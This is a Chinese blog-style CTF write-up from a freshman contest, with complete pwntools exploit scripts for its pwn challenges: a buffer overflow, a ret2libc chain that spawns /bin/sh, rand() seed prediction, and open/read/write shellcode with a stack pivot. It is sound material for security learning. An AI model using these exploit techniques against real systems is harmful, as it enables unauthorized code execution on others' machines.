序

海大新生赛，师傅们出题（pwn）确实很简单，没有ak我自己也不理解，反正最后一题本地确实通了🥹🥹🥹

最后附赠一道还有2分钟比赛结束的时候被我无意间玩出来的web题

EASY PWN

easypwn

确实easy，啥也不用干，强行覆盖就行：

from pwn import *

p = process('./easypwn')
# p = remote('node6.anna.nssctf.cn', 28171)
payload = b'a' * 0x1f
p.sendline(payload)
p.interactive()

Shellcode

shellcode

看见nx保护了，直接无脑ret2libc

from pwn import *

# p = process('./shellcode')
p = remote('node4.anna.nssctf.cn', 28510)
elf = ELF('./shellcode')
lib = ELF('./libc6_2.27-3ubuntu1_amd64.so')
pop_rdi = 0x00000000004007b3
ret_addr = 0x000000000040028e
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
p.sendline(b'aaaa')
payload = b'a' * (0xa + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\00'))
print(hex(puts_addr))
base_addr = puts_addr - lib.sym['puts']
print(hex(base_addr))
system_addr = base_addr + lib.sym['system']
binsh_addr = base_addr + next(lib.search(b'/bin/sh'))
p.sendline(b'aaaa')
payload = b'a' * (0xa + 0x8) + p64(ret_addr) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()

真男人下120层

bin

套了一堆随机数，本身没什么难度

from pwn import *
from ctypes import *

# p = process('./bin')
p = remote('node5.anna.nssctf.cn', 28986)
elf = ELF('./bin')
libc = cdll.LoadLibrary('./libc6_2.27-3ubuntu1_amd64.so')
libc.srand(libc.time(0))
v4 = libc.rand()
libc.srand(v4 % 3 - 1522127470)
[p.sendline(str(libc.rand() % 4 + 1)) for i in range(120)]
p.interactive()

Random

RANDOM

名叫随机数，实际上是一个开了沙盒的shellcode，栈迁移了一下写入orw的shellcode，第一次自己码了一部分shellcode，可惜远程没通：

from pwn import *
from ctypes import *

context(arch='amd64')
p = process('./RANDOM')
# p = remote('node6.anna.nssctf.cn', 28599)
elf = ELF('./RANDOM')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
p.sendline(str(libc.rand() % 50))
haha_addr = 0x40094A
shellcode1 = asm('''
    mov edx,0x67616c66
    push rdx
    mov rdi,rsp
    mov eax,2
    syscall
    mov edi,eax
    mov rsi,rsp
    xor eax,eax
    syscall
    xor edi,2
    mov eax,edi
    syscall
''')
shellcode2 = asm("""
    xor esi,esi
    sub rsp,0x28
    jmp rsp
""")
print(len(shellcode1))
print(len(shellcode2))
payload = shellcode1 + shellcode2 + p64(haha_addr)
p.sendline(payload)
p.interactive()

hate eat snake

一个web题，太有意思了，因为RANDOM很生气的博主要挑战60s，然后显然手残的博主做不到，但是博主惊喜发现，贪吃蛇寄了之后，放在那里也会记时，然后就死等60s捡了个flag🥵🤗💥💖